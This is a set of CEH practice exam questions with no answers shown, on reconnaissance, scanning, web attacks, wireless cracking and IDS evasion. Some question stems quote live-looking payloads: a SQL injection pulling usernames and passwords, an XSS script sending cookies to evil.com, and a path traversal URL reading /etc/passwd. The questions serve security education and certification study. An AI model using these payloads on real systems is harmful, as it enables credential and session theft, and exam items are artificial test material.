Certified Ethical Hacker (CEH) Practice Exam: Test Your Knowledge 2025

A penetration tester is performing reconnaissance on a target organization. They use a tool that queries DNS records to find mail servers, name servers, and other DNS information without directly interacting with the target's systems. Which technique is the tester using?

During a network scan, you discover that port 445 is open on a Windows server. Which enumeration technique would be MOST appropriate to gather user accounts and shared resources from this system?

An attacker sends a specially crafted TCP packet with the SYN and FIN flags both set to a target host. What type of scan is this?

A security analyst discovers that an attacker has been using Mimikatz on a compromised Windows domain controller. What is the PRIMARY purpose of this tool?

An organization's IDS detected the following HTTP request: GET /products?id=1 UNION SELECT username,password FROM users--. What type of attack is being attempted?

During a wireless penetration test, you capture a WPA2 four-way handshake between a client and access point. What is the NEXT step to attempt to crack the Wi-Fi password?

A malware analyst is examining a suspicious executable. They run it in a sandboxed environment and observe it connecting to a C2 server, downloading additional payloads, and establishing persistence via a registry run key. Which type of malware analysis is being performed?

An attacker positions themselves between a victim and the default gateway on a local network. They send forged ARP replies to both parties, associating their MAC address with the IP address of the other party. What attack is being performed?

A web application allows users to enter their name in a form field. An attacker enters: <script>document.location='http://evil.com/steal?c='+document.cookie</script>. When other users view the page, their cookies are sent to the attacker. What type of XSS attack is this?

An attacker wants to perform a denial-of-service attack by exploiting the TCP three-way handshake. They send a flood of SYN packets to the target without completing the handshake. What type of DoS attack is this?

A penetration tester wants to identify the operating system running on a remote host without sending any packets directly to the target. Which technique should they use?

A company stores sensitive customer data in an AWS S3 bucket. A security audit reveals the bucket's ACL allows 'Everyone' to list objects. What is this misconfiguration classified as?

An attacker wants to crack a password hash but has limited computing power. They decide to use a precomputed table that maps hash values back to plaintext passwords. What is this technique called?

During an IoT security assessment, you discover that a smart camera device is using the MQTT protocol for communication. The device is transmitting data to a broker without any authentication. What is the PRIMARY security concern?

A security researcher receives a phishing email that appears to come from the CEO. The email uses the CEO's exact name and email address in the 'From' header. Upon investigation, the researcher finds the email originated from an external server. What technique was used?

An attacker uses Metasploit to exploit a vulnerability on a target system and gains a Meterpreter shell. They then run 'getsystem' to escalate privileges. What is the attacker attempting to do?

A penetration tester needs to bypass a network-based IDS. They decide to fragment their attack payloads into very small IP fragments. Why might this technique be effective?

Which of the following is the BEST countermeasure against session hijacking attacks in a web application?

An attacker exploits a vulnerability in a web server's configuration that allows them to access the /etc/passwd file by manipulating a URL parameter: http://target.com/view?file=../../../../etc/passwd. What type of vulnerability is this?

An organization uses WPA3-Personal for their wireless network. Compared to WPA2-Personal, what is the PRIMARY security improvement provided by WPA3?